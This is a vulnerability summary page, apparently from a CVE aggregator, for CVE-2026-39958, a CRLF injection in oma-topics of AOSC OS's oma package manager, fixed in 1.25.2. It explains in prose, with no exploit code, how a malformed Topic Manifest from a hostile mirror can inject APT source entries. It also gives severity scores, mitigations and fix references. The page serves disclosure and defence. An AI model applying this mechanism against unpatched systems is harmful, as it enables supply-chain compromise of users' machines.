CVE-2026-39958
Published: 09 April 2026
Summary
CVE-2026-39958 is a critical-severity CRLF Injection (CWE-93) vulnerability. Its CVSS base score is 9.1 (Critical).
Operationally, exploitation aligns with the MITRE ATT&CK technique Compromise Software Supply Chain (T1195.002); ranked at the 17.4th percentile by exploit likelihood (below the median); it is not currently listed in the CISA KEV catalog.
The strongest mitigations our analysis identified are NIST 800-53 SI-10 (Information Input Validation) and SI-2 (Flaw Remediation).
Threat & Defense at a Glance
Threat & Defense Details
Mitigating Controls (NIST 800-53 r5)AI
Directly mandates validation of untrusted inputs like the name field in remote Topic Manifests to block malformed data injecting malicious APT source entries.
Requires timely identification, reporting, and patching of flaws in oma package manager, such as updating to version 1.25.2 that adds transliteration checks.
Enforces configuration change control processes for files like /etc/apt/sources.list.d/atm.list to authorize and review additions of repository sources.
MITRE ATT&CK Enterprise TechniquesAI
Why these techniques?
The vulnerability allows a remote attacker controlling a repository mirror to inject unauthorized/malicious APT source entries into /etc/apt/sources.list.d/ via malformed Topic Manifests, directly enabling compromise of the software supply chain to facilitate installation of malicious packages.
NVD Description
oma is a package manager for AOSC OS. Prior to 1.25.2, oma-topics is responsible for fetching metadata for testing repositories (topics) named "Topic Manifests" ({mirror}/debs/manifest/topics.json) from remote repository servers, registering them as APT source entries. However, the name field in…
more
said metadata were not checked for transliteration. In this case, a malicious party may supply a malformed Topic Manifest, which may cause malicious APT source entries to be added to /etc/apt/sources.list.d/atm.list as oma-topics finishes fetching and registering metadata. This vulnerability is fixed in 1.25.2.
Deeper analysisAI
CVE-2026-39958 is a vulnerability in the oma package manager for AOSC OS, specifically affecting the oma-topics component prior to version 1.25.2. oma-topics fetches metadata known as "Topic Manifests" from remote repository servers at paths like {mirror}/debs/manifest/topics.json and registers them as APT source entries. The name field in these manifests is not checked for transliteration issues, allowing malformed manifests to inject unauthorized entries into /etc/apt/sources.list.d/atm.list during the fetching and registration process. The vulnerability is rated at CVSS 9.1 (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:H) and maps to CWE-93.
A remote attacker who can supply a malformed Topic Manifest—such as by controlling a mirror or testing repository—can exploit this with network access, low complexity, no privileges, and no user interaction. Successful exploitation causes oma-topics to add attacker-controlled APT source entries to the system's sources list, potentially enabling the installation of malicious packages and compromising system integrity and availability.
The vulnerability is fixed in oma version 1.25.2. Mitigation details are provided in the GitHub security advisory at GHSA-86jc-7r6q-cr3f, pull request #733, commit b361c0f219bbf91a684610c76210f71f093dbc18, and the release notes for v1.25.2. Security practitioners should ensure systems update to at least version 1.25.2.
Details
- CWE(s)